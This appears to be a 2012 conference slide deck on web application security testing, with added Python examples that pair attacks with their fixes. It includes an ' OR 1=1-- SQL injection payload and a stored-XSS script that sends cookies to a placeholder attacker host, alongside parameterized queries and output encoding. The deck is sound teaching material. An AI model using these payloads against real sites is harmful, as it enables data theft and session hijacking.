Copyright © 2012 Aware Corporation Ltd. “Quality is the link to Success”

Web Application Security Testing - Aware in BugDay Bangkok 2012


Page 1: Web Application Security Testing - Aware in BugDay Bangkok 2012

Page 2

Agenda

• What kind of application security vulnerabilities should be tested?

• Methodology for testing

• Open source tools available

• Prioritizing application security defects

Page 3

Testing Security in Web Applications

Page 4

Case Studies

Page 5

Web Application Security Testing

Page 6

Different Security Standards

Page 7

OWASP Top 10

OWASP (Open Web Application Security Project) is an organization that provides unbiased, practical and cost-effective information about application and Internet security. Project members include security experts from around the world who share their knowledge of vulnerabilities, threats, attacks and countermeasures. The OWASP Top 10 is its list of the ten most critical web application security risks.

http://www.owasp.org

Page 8

OWASP Top 10 Testing

The test plan follows the OWASP Testing Guide (v3), which is divided into 9 sub-categories and 66 controls:

Information Gathering

Configuration Management

Authentication

Session Management

Authorization

Business Logic

Data Validation

Denial of Service

Web Services

Page 9

Top Attacks

• SQL Injection – SQL injection is a technique that takes advantage of non-validated input to pass attacker-chosen SQL through a web application for execution by the backend database.

• Cross Site Scripting – Cross-site scripting (XSS) is a vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users, so the script runs in those users' browsers with the page's privileges.

• Authentication – Authentication and session management includes all aspects of handling user authentication and managing active sessions. Authentication is a critical aspect of this process, but even solid authentication mechanisms can be undermined by flawed credential management functions.

Page 10

SQL Injection

[Diagram: an application attack passes through the network layer (Firewall, Hardened OS, Web Server, App Server, Firewall) into the application layer, where Custom Code sits in front of Databases, Legacy Systems, Web Services, Directories, Human Resources and Billing, serving the business functions Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce and Bus. Functions. Flow: HTTP request → SQL query → DB Table → HTTP response.]

Form fields: Account: / SKU:

Query sent to the database: "SELECT * FROM accounts WHERE acct='' OR 1=1--'"

1. Application presents a form to the attacker

2. Attacker sends an attack in the form data

3. Application forwards attack to the database in a SQL query

4. Database runs query containing attack and sends encrypted results back to application

5. Application decrypts data as normal and sends results to the user

Account Summary returned to the attacker (the slide's sample data): Acct:5424-6066-2134-4334, Acct:4128-7574-3921-0192, Acct:5424-9383-2039-4029, Acct:4128-0004-1234-0293
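The following is an added example, not code from the slides or from Aware: it reproduces the injection on the SQL Injection slide against an in-memory SQLite database and puts the parameterized query beside it. The accounts table, its schema (owner, acct) and the rows are constructed here from the slide's sample account numbers; the function names are this example's own.

```python
"""Added example: the slide's ' OR 1=1-- payload against a string-built
query versus a parameterized one. Database contents are constructed."""
import sqlite3

# Sample rows, constructed for this example from the slide's Account Summary.
SAMPLE_ACCOUNTS = [
    ("alice", "5424-6066-2134-4334"),
    ("bob", "4128-7574-3921-0192"),
    ("carol", "5424-9383-2039-4029"),
    ("dave", "4128-0004-1234-0293"),
]

# The payload the slide shows arriving in the form's account field.
INJECTION = "' OR 1=1--"


def make_db():
    """Build the throw-away database (assumed schema: owner, acct)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE accounts (owner TEXT, acct TEXT)")
    con.executemany("INSERT INTO accounts VALUES (?, ?)", SAMPLE_ACCOUNTS)
    return con


def build_vulnerable_query(acct):
    """Step 3 on the slide: user input pasted straight into the SQL text."""
    return "SELECT * FROM accounts WHERE acct='" + acct + "'"


def lookup_vulnerable(con, acct):
    """Runs the concatenated query; the attacker now controls the WHERE
    clause, and the trailing quote is swallowed by the -- comment."""
    return con.execute(build_vulnerable_query(acct)).fetchall()


def lookup_safe(con, acct):
    """Parameterized query: the driver sends the value separately from the
    SQL text, so quotes and comment markers in it are just characters."""
    return con.execute(
        "SELECT * FROM accounts WHERE acct=?", (acct,)
    ).fetchall()


def demo():
    """Return (query text, rows leaked by the vulnerable path, rows from the
    safe path) for the slide's payload so the two can be compared."""
    con = make_db()
    query = build_vulnerable_query(INJECTION)
    leaked = lookup_vulnerable(con, INJECTION)
    safe = lookup_safe(con, INJECTION)
    return query, leaked, safe


if __name__ == "__main__":
    q, leaked, safe = demo()
    print("Query sent to the database:", q)
    print("Vulnerable path returned %d rows (every account)" % len(leaked))
    print("Parameterized path returned %d rows" % len(safe))
```

The vulnerable path returns all four accounts for a field value that matches none of them; the parameterized path returns nothing. When testing, the same payload in every string parameter of the target, with the response size and error text compared against a benign value, is the quickest manual check before handing the site to a scanner.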

Page 11

Cross Site Scripting

[Diagram: an application with a stored XSS vulnerability, whose Custom Code serves the business functions Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce and Bus. Functions.]

1. Attacker sets the trap – update my profile: the attacker enters a malicious script into a web page that stores the data on the server

2. Victim views page – sees attacker profile: the script runs inside the victim's browser with full access to the DOM and cookies

3. Script silently sends the victim's session cookie to the attacker
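The following is an added example, not code from the slides or from Aware: a minimal profile page that stores whatever the attacker submits (step 1 on the slide) and renders it to the next visitor (step 2). One renderer concatenates the stored text into the HTML, so the script would execute in the victim's browser; the other HTML-encodes it. The profile store, the payload, the placeholder host name and the cookie header are all constructed for this example.

```python
"""Added example: stored XSS in a profile bio, the output-encoded fix, and
the HttpOnly cookie flag that blunts step 3 (cookie theft). Everything
here is constructed; attacker.invalid is a placeholder host."""
import html

# Step 3 on the slide: a script that ships document.cookie to the attacker.
PAYLOAD = ('<script>new Image().src='
           '"http://attacker.invalid/c?"+document.cookie</script>')

# In-memory store of profile bios, keyed by user name (constructed).
PROFILES = {}


def update_profile(user, bio):
    """Step 1: the application stores the submitted bio without filtering."""
    PROFILES[user] = bio


def render_vulnerable(user):
    """Step 2, vulnerable: the stored bio is concatenated into the HTML, so
    a <script> tag in it is parsed and executed by the victim's browser."""
    return "<h1>%s</h1><div class=bio>%s</div>" % (user, PROFILES[user])


def render_safe(user):
    """Output encoding: <, >, &, and quotes become entities, so the browser
    displays the payload as text instead of executing it."""
    return "<h1>%s</h1><div class=bio>%s</div>" % (
        html.escape(user), html.escape(PROFILES[user]))


def session_cookie(value, http_only=True):
    """Defence in depth for step 3: an HttpOnly cookie is not readable from
    document.cookie even if a script does run in the page."""
    flags = "; Path=/; Secure"
    if http_only:
        flags += "; HttpOnly"
    return "Set-Cookie: SESSIONID=%s%s" % (value, flags)


def script_present(page):
    """Crude check: does the rendered page still contain a <script> tag?"""
    return "<script>" in page


if __name__ == "__main__":
    update_profile("attacker", PAYLOAD)
    print(render_vulnerable("attacker"))
    print(render_safe("attacker"))
    print(session_cookie("abc123"))
```

Encoding at output time is the fix for the rendering step; the HttpOnly flag does not stop the script from running, it only keeps the session cookie out of its reach, so treat it as a second layer rather than a substitute. When testing, submit a harmless marker such as a unique string wrapped in a tag, then check whether it comes back encoded or raw on every page that displays the field.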

Page 12

Authentication

Page 13

Tools Overview

Page 14

Tools

• Proxies

– Burp Suite

– Paros

– WebScarab

– Fiddler

• FoxyProxy plugin

• Open source scanners

– Skipfish

Page 15

Burp Suite

http://portswigger.net/proxy/

Page 16

FoxyProxy

https://addons.mozilla.org/en-US/firefox/addon/2464/

Page 17

Skipfish

http://code.google.com/p/skipfish/

A fully automated, active web application security reconnaissance tool. Checks include:

* Server-side SQL injection (including blind vectors, numerical parameters).

* Stored and reflected XSS.

* Directory listing bypass vectors.

* External untrusted embedded content.

Page 18

Cheat Sheet

Page 19

Cheat Sheet

Page 20

Tools Demonstration

Page 21

RISK

• Discovering vulnerabilities is important, but just as important is being able to estimate the associated risk to the business.

Risk = Likelihood * Impact

Page 22

Prioritizing RISK

Page 23

Threat Risk

DREAD:

Damage potential

Reproducibility

Exploitability

Affected users

Discoverability
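The following is an added example, not code from the slides or from Aware, serving both the Risk = Likelihood * Impact formula on page 21 and the DREAD factors on page 23. It averages the five DREAD ratings, as in the original Microsoft scheme, multiplies likelihood by impact, and ranks a set of findings. The 0..10 rating scale, the High/Medium/Low cut points and the sample findings with their ratings are this example's assumptions, not numbers from the slides.

```python
"""Added example: DREAD scoring and Likelihood * Impact, applied to
constructed findings with assumed ratings."""

DREAD_FACTORS = ("damage", "reproducibility", "exploitability",
                 "affected_users", "discoverability")


def dread_score(rating):
    """Average of the five DREAD ratings; each must be an int in 0..10
    (the scale is this example's assumption)."""
    total = 0
    for factor in DREAD_FACTORS:
        value = rating[factor]
        if not 0 <= value <= 10:
            raise ValueError("%s must be in 0..10, got %r" % (factor, value))
        total += value
    return total / len(DREAD_FACTORS)


def likelihood_impact(likelihood, impact):
    """Page 21: Risk = Likelihood * Impact (both on a 1..10 scale here)."""
    for name, v in (("likelihood", likelihood), ("impact", impact)):
        if not 1 <= v <= 10:
            raise ValueError("%s must be in 1..10" % name)
    return likelihood * impact


def severity(score, high=7.0, medium=4.0):
    """Bucket a DREAD score; the 7/4 cut points are assumed, not the slide's."""
    if score >= high:
        return "High"
    if score >= medium:
        return "Medium"
    return "Low"


# Constructed sample findings with assumed ratings.
FINDINGS = [
    ("SQL injection in account lookup",
     dict(damage=10, reproducibility=10, exploitability=9,
          affected_users=10, discoverability=8)),
    ("Stored XSS in profile bio",
     dict(damage=7, reproducibility=10, exploitability=8,
          affected_users=8, discoverability=7)),
    ("Verbose server banner",
     dict(damage=2, reproducibility=10, exploitability=3,
          affected_users=2, discoverability=10)),
]


def prioritize(findings):
    """Return (name, DREAD score, severity) tuples, highest score first."""
    scored = []
    for name, rating in findings:
        score = dread_score(rating)
        scored.append((name, score, severity(score)))
    return sorted(scored, key=lambda item: item[1], reverse=True)


if __name__ == "__main__":
    for name, score, sev in prioritize(FINDINGS):
        print("%-32s DREAD=%4.1f %s" % (name, score, sev))
    print("Likelihood 9 x Impact 10 =", likelihood_impact(9, 10))
```

Two findings with the same DREAD average can have very different profiles (a trivially discoverable low-damage issue versus a hard-to-find critical one), so keep the individual factor ratings in the report next to the average rather than reporting the average alone.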

Page 24

Page 25